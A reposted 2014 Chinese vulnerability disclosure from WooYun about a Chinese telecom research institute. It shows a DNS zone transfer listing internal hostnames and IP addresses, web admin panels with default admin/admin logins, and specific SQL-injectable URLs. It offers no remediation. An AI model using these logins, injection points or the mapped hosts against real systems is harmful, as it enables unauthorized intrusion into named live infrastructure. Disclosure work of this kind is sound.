记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

工业和信息化部电信研究院漏洞打包

2014-05-31 16:05

首先是发现工信部电信研究院的DNS域传送~



C:\Users\LeLe's>nslookup

默认服务器: X

Address: X



> set type=ns

>

> catr.cn

服务器: X

Address: X



非权威应答:

catr.cn nameserver = dns.cci.cn.net

catr.cn nameserver = dns.catr.com.cn



dns.cci.cn.net internet address = 219.239.97.125

dns.catr.com.cn internet address = 114.242.138.121

> server dns.catr.com.cn

默认服务器: dns.catr.com.cn

Address: 114.242.138.121



> ls catr.cn

[dns.catr.com.cn]

catr.cn. NS server = dns.cci.cn.net

catr.cn. NS server = dns.catr.com.cn

catr.cn. A 219.239.97.40

#koa A 219.239.97.46

#mail A 219.239.97.60

acsi A 219.239.97.52

apectel49 A 219.239.97.126

apectelmra A 219.239.97.52

bbs A 219.239.97.22

blog A 219.239.97.113

broadband-m2m A 219.239.97.52

catrma A 219.239.97.64

catrmb A 219.239.97.65

ccicc A 219.239.97.52

certificate A 219.239.97.37

cff A 219.239.97.52

chinacc A 219.239.97.52

chinatcc A 219.239.97.52

chinatqac A 219.239.97.52

cim A 219.239.97.52

club A 219.239.97.113

clubnew A 219.239.97.22

elink.crp A 219.239.97.24

m.crp A 219.239.97.24

ctu A 219.239.97.52

data A 219.239.97.52

db A 219.239.97.85

down A 219.239.97.22

ecte A 219.239.97.52

english A 219.239.97.52

forum A 219.239.97.52

ftp A 219.239.97.28

ids A 219.239.97.23

iiinsight A 219.239.97.52

info A 219.239.97.52

ip A 59.108.230.35

ipc A 219.239.97.52

ipe A 219.239.97.52

ituchina A 219.239.97.52

ituchina-bbs A 219.239.97.50

localhost A 127.0.0.1

mail A 114.242.138.122

mail A 219.239.97.64

mailtest A 219.239.97.126

main A 219.239.97.52

manage A 219.239.97.52

market A 219.239.97.52

media A 219.239.97.52

mobileforum A 219.239.97.52

mstt A 219.239.97.80

news A 219.239.97.52

oldmail A 219.239.97.60

pdri A 219.239.97.52

pm A 219.239.97.52

policy A 219.239.97.52

pr A 219.239.97.52

report A 219.239.97.52

ritt A 219.239.97.52

sa A 219.239.97.52

search A 219.239.97.52

service A 219.239.97.52

shouji A 219.239.97.52

smtp1 A 114.242.138.123

sp A 219.239.97.52

spam A 219.239.97.34

standard A 219.239.97.52

stcte A 219.239.97.52

stic A 219.239.97.52

tcg A 219.239.97.52

tdlte A 114.242.138.108

tech A 219.239.97.52

teleinfo A 219.239.97.80

en.teleinfo A 219.239.97.80

tenaa A 219.239.97.52

test A 219.239.97.55

tlc A 219.239.97.52

tm A 219.239.97.52

tntcatr.cn A 219.239.97.52

top10 A 219.239.97.52

tousu A 219.239.97.53

ttl A 219.239.97.52

vaschina A 219.239.97.52

vast A 219.239.97.52

view A 219.239.97.52

vpn A 219.239.97.46

webpic A 219.239.97.52

wmail A 219.239.97.83

wt A 219.239.97.80

www A 219.239.97.52

xb A 219.239.97.52

xmldata A 219.239.97.63

zhaopin A 219.239.97.52

zxipr A 219.239.97.112

zxpsipr A 219.239.97.112





然后挨个测试....



数据监控系统 http://db.catr.cn/mainpage.aspx admin admin





项目招标信息平台 http://xmldata.catr.cn/indexReal.jsp admin admin





SQL注入 



http://www.chinattl.com/ttlweb/display_A.aspx?id=2328



http://219.239.97.36/cn/showclass.asp?classid=187



http://219.239.97.36/cn/showclass.asp?classid=39





http://219.239.97.51/chinacc/ShowArticle.asp?ArticleID=1847'



owerEasy 错误 '800a000d'



Type mismatch



/chinacc/ShowArticle.asp,行3

漏洞证明:

12.png







22.png





不一一上图了....



我发现的只是一小部分,很表面的东西....

修复方案:

...........我不会

知识来源: www.wooyun.org/bugs/wooyun-2014-057163

阅读:177572 | 评论:1 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“工业和信息化部电信研究院漏洞打包”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

推广

标签云